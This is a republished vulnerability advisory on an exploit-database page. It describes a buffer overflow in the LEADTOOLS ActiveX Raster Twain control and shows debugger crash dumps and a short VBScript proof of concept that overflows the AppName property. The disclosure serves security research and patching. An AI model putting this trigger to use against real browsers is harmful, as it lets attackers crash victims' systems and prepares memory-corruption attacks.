|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 8905 Credit : LiquidWorm Date : 01.09.2010 Exploit Code : LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC Vendor: LEAD Technologies, Inc. Product Web Page: http://www.leadtools.com Affected Version: 16.5.0.2 Summary: With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use while low-level functionality is provided for flexibility and control in even the most demanding scanning applications. Desc: The Raster Twain Object Library suffers from a buffer overflow vulnerability because it fails to check the boundry of the user input. Tested On: Microsoft Windows XP Professional SP3 (EN) Windows Internet Explorer 8.0.6001.18702 RFgen Mobile Development Studio 4.0.0.06 (Enterprise) =============================================================== (2c4.2624): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000 eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 ntdll!wcscpy+0xe: 7c912f4e 668901 mov word ptr [ecx],ax ds:0023:01649000=???? 0:000> g (2c4.2624): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041 eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 ntdll!RtlpNtMakeTemporaryKey+0x6a74: 7c96c540 807b07ff cmp byte ptr [ebx+7],0FFh ds:0023:00410040=?? ================================================================== Registers: -------------------------------------------------- EIP 7C912F4E EAX 00130041 EBX 100255BC -> 10014840 -> Asc: @H@H ECX 01649000 EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EDI 00000000 ESI 0013EF6C -> BAAD0008 EBP 0013EDA8 -> 0013EDDC ESP 0013EDA8 -> 0013EDDC -- EIP 7C96C540 EAX 00410039 EBX 00410039 ECX 00150000 -> 000000C8 EDX 00150608 -> 7C97B5A0 EDI 00410041 ESI 00150000 -> 000000C8 EBP 0013F228 -> 0013F278 ESP 0013F220 -> 00150000 ArgDump: -------------------------------------------------- EBP+8 016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA EBP+16 00000000 EBP+20 0013EF6C -> BAAD0008 EBP+24 100255BC -> 10014840 -> Asc: @H@H EBP+28 0013EDB8 -> 00000000 -- EBP+8 00150000 -> 000000C8 EBP+12 00410039 EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap EBP+20 00000000 EBP+24 00410041 EBP+28 7C80FF12 -> 9868146A CompanyName LEAD Technologies, Inc. FileDescription LEADTOOLS ActiveX Raster Twain (Win32) FileVersion 16,5,0,2 InternalName LTRTNU LegalCopyright © 1991-2009 LEAD Technologies, Inc. OriginalFileName LTRTNU.DLL ProductName LEADTOOLS® for Win32 ProductVersion 16.5.0.0 Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F} RegKey Safe for Script: True RegKey Safe for Init: True Implements IObjectSafety: False Exception Code: ACCESS_VIOLATION Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll) Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll) Exception Code: BREAKPOINT Disasm: 7C90120E INT3 (ntdll.dll) Seh Chain: -------------------------------------------------- 1 7C839AC0 KERNEL32.dll 2 FC2950 VBSCRIPT.dll 3 7C90E900 ntdll.dll 7C912F4E MOV [ECX],AX <--- CRASH 7C96C540 CMP BYTE PTR [EBX+7],FF <--- CRASH 7C90120F RETN <--- CRASH ================================================================== Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk 24.08.2010 Zero Science Lab Advisory ID: ZSL-2010-4960 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php PoC: <object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll" prototype = "Property Let AppName As String" memberName = "AppName" progid = "LTRASTERTWAINLib_U.LEADRasterTwain_U" argCount = 1 arg1=String(9236, "A") target.AppName = arg1 </script>  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |